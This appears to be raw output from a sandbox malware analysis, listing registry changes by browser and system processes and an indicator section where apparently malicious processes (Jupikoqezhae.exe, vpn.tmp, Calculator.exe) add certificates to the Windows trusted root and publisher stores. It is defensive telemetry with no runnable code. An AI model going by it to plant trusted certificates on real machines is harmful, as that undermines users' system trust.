\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\totalcoolblog.com\NumberO = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance ha.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{08DB2AE0-0C81-4FE3-B724-F3F9FAFEEDBB}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4274743b14c9d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\ = "1667" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5ae0111f14c9d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 500d917715c9d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = d0bee22414c9d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WLD4WMQ3-MJ3I-MV57-663Y-EXT24WLKVJ14} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "341871647" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe -
Processes:
Jupikoqezhae.execmd.exevpn.tmpCalculator.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 Jupikoqezhae.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f Jupikoqezhae.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Calculator.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e